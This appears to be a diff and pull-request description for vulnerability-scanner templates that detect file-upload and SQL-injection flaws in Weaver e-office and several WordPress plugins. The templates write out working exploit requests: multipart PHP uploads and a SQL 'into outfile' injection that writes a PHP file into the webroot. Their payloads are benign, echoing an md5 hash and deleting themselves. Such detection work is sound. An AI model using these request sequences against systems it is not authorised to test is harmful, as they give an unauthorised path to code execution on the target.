
--- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
@@ -14,9 +14,11 @@ info:
     max-request: 2
     fofa-query: app="泛微-EOffice"
   tags: weaver,e-office,oa,sqli
+
 variables:
   filename: "{{to_lower(rand_base(5))}}"
-  payload: "[group]:[1]|[groupid]:[1 union select '<?php echo md5(weaver);?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
+  string: "weaver-group-xml-sqli"
+  payload: "[group]:[1]|[groupid]:[1 union select '<?php echo md5(\"{{string}}\");unlink(__FILE__);?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
 
 http:
   - raw:
@@ -33,7 +35,7 @@ http:
       - type: word
         part: body_2
         words:
-          - "758058d8987e7a9ec723bcdbec6c407e"
+          - '{{md5(string)}}'
 
       - type: status
         status:

--- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
@@ -14,7 +14,7 @@ info:
   tags: weaver,e-office,intrusive,rce,file-upload
 variables:
   filename: "{{to_lower(rand_base(5))}}"
-  string: "{{randstr}}"
+  string: "weaver-lazyuploadify-file-upload"
 
 http:
   - raw:
@@ -33,7 +33,7 @@ http:
         Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php"
         Content-Type: application/octet-stream
 
-        <?php echo "{{string}}";unlink(__FILE__);?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         ------WebKitFormBoundaryjetvpuye--
       - |
         GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1
@@ -58,8 +58,11 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - "status_code_1 == 200"
           - "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')"
-          - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
         condition: and
+
+      - type: word
+        part: body_3
+        words:
+          - '{{md5(string)}}'
 # digest: 4b0a00483046022100b1ecbee09f268b25db456fc80be7fb4e0436700a30c52c333959bad8e6396eaa022100ecdc3c2a0b7b463361a617fa59de8766cc175aa00c02f53aab647db22bf0b837:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
@@ -15,6 +15,7 @@ info:
   tags: weaver,e-office,oa,rce,intrusive,fileupload
 variables:
   filename: "{{to_lower(rand_base(5))}}"
+  string: "weaver-office-server-file-upload"
 
 http:
   - raw:
@@ -30,7 +31,7 @@ http:
         Content-Disposition: form-data;name="FileData";filename="{{filename}}.php"
         Content-Type: application/octet-stream
 
-        <?php echo md5(weaver);?>'
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
 
         ------WebKitFormBoundaryLpoiBFy4ANA8daew
         Content-Disposition: form-data;name="FormData"
@@ -46,7 +47,7 @@ http:
       - type: word
         part: body_2
         words:
-          - "758058d8987e7a9ec723bcdbec6c407e"
+          - '{{md5(string)}}'
 
       - type: status
         status:

--- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
+++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
@@ -11,10 +11,11 @@ info:
     verified: true
     max-request: 3
     fofa-query: app="泛微-EOffice"
-  tags: weaver,e-office,oa,instrusive,rce,intrusive
+  tags: weaver,e-office,oa,intrusive,rce,intrusive,fileupload
+
 variables:
   filename: "{{to_lower(rand_base(5))}}"
-  string: "{{randstr}}"
+  string: "weaver-uploadify-file-upload"
 
 http:
   - raw:
@@ -33,7 +34,7 @@ http:
         Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php"
         Content-Type: application/octet-stream
 
-        <?php echo "{{randstr}}";unlink(__FILE__);?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         ------WebKitFormBoundaryjetvpuye--
       - |
         GET /attachment/personal/_temp.php HTTP/1.1
@@ -43,8 +44,11 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - "status_code_1 == 200"
           - "contains(body_2, 'imageSrc') && contains(body_2, 'height')"
-          - "status_code_3 == 200 && contains(body_3,'{{randstr}}')"
         condition: and
+
+      - type: word
+        part: body_3
+        words:
+          - '{{md5(string)}}'
 # digest: 4b0a00483046022100b9ada8f5c9c7c9375352c42246f9fb09f686f69dd499c02fe7b5ebb77c3d48d9022100e417a1341b83b7240f1c5a0bf814d5b9931112064dc0317b19fd6f0e2647a6c6:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml
+++ b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml
@@ -19,6 +19,9 @@ info:
     max-request: 2
   tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint
 
+variables:
+  string: "3dprint-arbitrary-file-upload"
+
 http:
   - raw:
       - |
@@ -35,18 +38,16 @@ http:
         Content-Disposition: form-data; name="file"; filename={{randstr}}.php
         Content-Type: text/php
 
-        <?php echo '3DPrint-arbitrary-file-upload'; ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         -----------------------------54331109111293931601238262353--
       - |
         GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
-      - type: dsl
-        dsl:
-          - 'contains(header_2, "text/html")'
-          - "status_code_2 == 200"
-          - "contains(body_2, '3DPrint-arbitrary-file-upload')"
-        condition: and
+      - type: word
+        part: body_2
+        words:
+          - '{{md5(string)}}'
 
 # digest: 490a0046304402204014e03adf59b73d5219aa2cf87a8a95ae9a277a296473ccbfb68c7d86e10fce022023c5fa1f1eee7bce47ce0038c7bb17f30859773a2017a1db43e095fb48f8a3d0:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
+++ b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml
@@ -17,6 +17,9 @@ info:
     max-request: 2
   tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive
 
+variables:
+  string: "ait-csv-import-export-rce"
+
 http:
   - raw:
       - |
@@ -29,7 +32,7 @@ http:
         Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
         Content-Type: application/octet-stream
 
-        sep=;<?php echo md5('ait-csv-import-export-rce');?>
+        sep=;<?php echo md5("{{string}}");unlink(__FILE__);?>
 
         --------------------------ab360007dbae2de8--
       - |
@@ -39,12 +42,8 @@ http:
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_2
         words:
-          - "fe394b60dc324c3bac3060d600ad4349"
-
-      - type: status
-        status:
-          - 200
+          - '{{md5(string)}}'
 
 # digest: 490a004630440220644f99faec006ef48de167e6e9a5c70b704d0a180dfac6ac88341eb2dcecc7780220396204420fb32c1f832b3e122af2ba85db50e034b7ffbb70e1dee8fb7752a18f:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
+++ b/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
@@ -15,8 +15,10 @@ info:
   metadata:
     max-request: 3
   tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload
+
 variables:
   filepath: '{{rand_base(7, "abcdefghi")}}'
+  string: "wordpress-rce-simplefilelist"
 
 http:
   - raw:
@@ -46,7 +48,7 @@ http:
         Content-Disposition: form-data; name="file"; filename="{{filepath}}.png"
         Content-Type: image/png
 
-        <?php echo md5("wordpress-rce-simplefilelist"); phpinfo(); ?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         --6985fa39c0698d07f6d418b37388e1b2--
       - |
         POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
@@ -63,12 +65,9 @@ http:
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_3
         words:
-          - "aa5be3e9dec96f2f1a593b2f5b2288af"
-          - "PHP Version"
-          - "Configuration Command"
-        condition: and
+          - '{{md5(string)}}'
 
       - type: status
         status:

--- a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
+++ b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
@@ -14,11 +14,13 @@ info:
     verified: true
     max-request: 2
     publicwww-query: "/wp-content/plugins/kadence-blocks/"
-  tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,file-upload,intrusive
+  tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,fileupload,intrusive
+
 variables:
   str: "{{to_lower(rand_text_alpha(5))}}"
   email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
   filename: "{{to_lower(rand_text_alpha(5))}}"
+  string: "wp-kadence-blocks-rce"
 
 http:
   - raw:
@@ -48,7 +50,7 @@ http:
 
         GIF89a
 
-        <?php echo md5("{{randstr}}");?>
+        <?php echo md5("{{string}}");unlink(__FILE__);?>
         -----------------------------8779924633391890046425977712
         Content-Disposition: form-data; name="_kb_adv_form_post_id"
 


### PR DESCRIPTION
In this PR we have updated all the PHP file upload templates, now they are consistent as they all include the string in the variable

```
variables:
  string: "CVE-2021-24499"
```

All the templates now contain this payload: `<?php echo md5("{{string}}"); unlink(__FILE__);?>`. Using unlink, once the file upload is validated, it will be removed from the host. We are using the following matcher in all the templates:

```
      - type: word
        part: body
        words:
          - '{{md5(string)}}'
```

The only downside to this approach I can see is that once the template is matched, users will not be able to validate the file upload by visiting the link, as it is now automatically removed upon validation.